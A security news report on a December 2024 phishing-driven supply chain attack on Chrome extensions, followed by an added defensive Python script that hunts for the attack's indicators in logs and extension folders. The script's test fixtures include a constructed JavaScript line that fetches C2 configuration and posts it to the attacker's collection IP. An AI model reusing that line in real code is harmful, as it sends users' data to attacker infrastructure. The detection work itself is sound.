A sophisticated supply chain attack targeting Chrome browser extensions has come to light, potentially compromising hundreds of thousands of users.
The attack, which unfolded in December 2024, involved phishing campaigns aimed at extension developers and the injection of malicious code into legitimate Chrome extensions.
Sensitive user data, including API keys, session cookies, and authentication tokens from services like ChatGPT and Facebook for Business, was exfiltrated.
Investigations revealed that the threat actor had been active since at least 2023 and shifted tactics in late 2024 from distributing fake extensions to compromising legitimate ones through phishing and malicious OAuth applications.
Phishing Campaign Targeting Developers
The attackers launched a targeted phishing campaign against Chrome extension developers.
Spear-phishing emails were crafted to appear as official notifications from the Chrome Web Store, urging developers to authorize access to a malicious OAuth application named “Privacy Policy Extensions.”
These emails were sent from domains such as chromeforextension[.]com and supportchromestore[.]com, which mimicked legitimate Google services.
Once developers granted permissions to the malicious OAuth app, the attackers gained control over their extensions.
This allowed them to upload compromised versions containing malicious code to the Chrome Web Store.
The phishing emails redirected victims to adversary-controlled domains (e.g., checkpolicy[.]site), which eventually led to legitimate Google login pages for credential harvesting.
Compromised Extensions and Malicious Code
Approximately 15 Chrome extensions were compromised during this campaign, including popular tools like Proxy SwitchyOmega, GraphQL Network Inspector, and VidHelper Video Download Helper.
The malicious code injected into these extensions consisted of two primary scripts:
background.js: Operated in the background to exfiltrate sensitive data such as API keys and authentication tokens. It fetched configuration files from command-and-control (C2) servers and targeted specific platforms like ChatGPT and Facebook Business.
context_responder.js: Injected into all visited web pages to interact with browser URLs and harvest credentials based on patterns specified in configuration files hosted on C2 servers.
According to Sekoia, the attackers used a well-coordinated infrastructure involving multiple domains registered via Namecheap and hosted on AS20473 (VULTR).
Phishing domains such as chromeforextension[.]com were used for initial access, while C2 servers such as graphqlnetwork[.]pro hosted the configuration files fetched by the malicious scripts.
Data exfiltration occurred via subdomains hosted at 149.248.2[.]160, where a MySQL database likely stored the harvested data.
The infrastructure also included domains linked to earlier campaigns involving fake Chrome extensions distributed through SEO poisoning or malvertising since at least December 2023.
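As an added defensive example (not part of the original report and not Sekoia's tooling), the following Python script hunts for the indicators quoted above in the two places an incident responder would look first: proxy or DNS log lines, and the manifest and script files of locally installed extensions. The log format, the sample manifest and the JavaScript snippet are constructed for illustration; the domains, the IP address and the extension names are the ones the article lists. A name match only says that the installed version should be checked, because the article gives no version numbers, and the "content script on all pages" heuristic follows from the report's description of context_responder.js being injected into every visited page.

```python
# Added example: hunts for the report's indicators in logs and installed extensions.
# Sample log, manifest and script below are constructed, not real captures.
import json
import re
from pathlib import Path
from typing import Optional

# Network indicators from the article, kept defanged in source.
DEFANGED_DOMAINS = [
    "chromeforextension[.]com",   # phishing sender domain
    "supportchromestore[.]com",   # phishing sender domain
    "checkpolicy[.]site",         # redirect domain used by the phishing mails
    "graphqlnetwork[.]pro",       # C2 hosting the scripts' configuration files
]
DEFANGED_IPS = ["149.248.2[.]160"]  # exfiltration host

# Extensions the article names as compromised. A name match is only a prompt to
# check the installed version; the article gives no version numbers.
COMPROMISED_NAMES = {
    "Proxy SwitchyOmega",
    "GraphQL Network Inspector",
    "VidHelper Video Download Helper",
}

def refang(indicator: str) -> str:
    """Turn a defanged indicator ("a[.]b") back into a matchable host ("a.b")."""
    return indicator.replace("[.]", ".")

IOC_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IOC_IPS = {refang(i) for i in DEFANGED_IPS}

# Pulls host-like tokens (domains or dotted IPs) out of free-form text,
# skipping an optional scheme prefix and port suffix.
HOST_RE = re.compile(r"(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z0-9-]+)(?::\d+)?")

def host_matches(host: str) -> Optional[str]:
    """Return the indicator that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    if host in IOC_IPS:
        return host
    for domain in IOC_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None

def scan_log_lines(lines):
    """Return (line_number, host, indicator) for each log line that touches an IoC."""
    hits = []
    for number, line in enumerate(lines, 1):
        for host in HOST_RE.findall(line):
            indicator = host_matches(host)
            if indicator:
                hits.append((number, host.lower(), indicator))
                break
    return hits

def iocs_in_source(text: str) -> list:
    """Sorted list of indicators referenced anywhere in a script or config file."""
    found = {host_matches(h) for h in HOST_RE.findall(text)}
    found.discard(None)
    return sorted(found)

def manifest_findings(manifest: dict) -> list:
    """Reasons an extension manifest deserves a closer look."""
    reasons = []
    if manifest.get("name") in COMPROMISED_NAMES:
        reasons.append("name listed as compromised; verify installed version")
    # The report describes a content script injected into every visited page.
    broad = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
    for script in manifest.get("content_scripts", []):
        if broad & set(script.get("matches", [])):
            reasons.append("content script runs on all pages: " + ", ".join(script.get("js", [])))
    return reasons

def audit_extension_root(root) -> list:
    """Walk a Chrome profile's Extensions directory and report suspicious entries."""
    report = []
    for manifest_path in Path(root).rglob("manifest.json"):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        ext_dir = manifest_path.parent
        reasons = manifest_findings(manifest)
        iocs = set()
        for js_file in ext_dir.rglob("*.js"):
            try:
                iocs.update(iocs_in_source(js_file.read_text(encoding="utf-8", errors="ignore")))
            except OSError:
                continue
        if iocs:
            reasons.append("references IoC: " + ", ".join(sorted(iocs)))
        if reasons:
            report.append({"path": str(ext_dir), "name": manifest.get("name"),
                           "version": manifest.get("version"), "reasons": reasons})
    return report

# Constructed samples: a proxy log, a manifest shaped like the report's description, a script.
SAMPLE_PROXY_LOG = [
    "2024-12-26T09:12:01Z 10.0.0.5 CONNECT api.graphqlnetwork.pro:443 200",
    "2024-12-26T09:12:04Z 10.0.0.5 GET https://www.google.com/ 200",
    "2024-12-26T09:13:10Z 10.0.0.7 POST https://149.248.2.160/collect 200",
]
SAMPLE_MANIFEST = {
    "name": "Proxy SwitchyOmega", "version": "0.0.0-constructed",
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["context_responder.js"]}],
}
SAMPLE_BACKGROUND_JS = (
    'const CONFIG_URL = "https://api.graphqlnetwork.pro/config.json";\n'
    'fetch(CONFIG_URL).then(r => r.json()).then(cfg => send("https://149.248.2.160/collect", cfg));\n'
)

if __name__ == "__main__":
    print("log hits:", scan_log_lines(SAMPLE_PROXY_LOG))
    print("manifest:", manifest_findings(SAMPLE_MANIFEST))
    print("script IoCs:", iocs_in_source(SAMPLE_BACKGROUND_JS))
```

To run it against a real machine, point audit_extension_root at the profile's Extensions directory (for example Default/Extensions under the Chrome user data directory) and feed scan_log_lines the lines of an exported proxy or DNS log; subdomain matching is deliberate because the report says exfiltration went through subdomains of the attacker's infrastructure.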
This supply chain attack underscores the significant risks posed by compromised browser extensions, particularly when sensitive platforms like ChatGPT and Facebook Business are targeted.
The attacker’s shift from distributing fake extensions to compromising legitimate ones demonstrates evolving tactics in cybercrime.
Organizations and individual users must adopt robust security practices to mitigate such threats, including vigilance against phishing campaigns and proactive monitoring of browser activity.
This incident serves as a stark reminder of the vulnerabilities inherent in software supply chains and the importance of securing developer ecosystems against targeted attacks.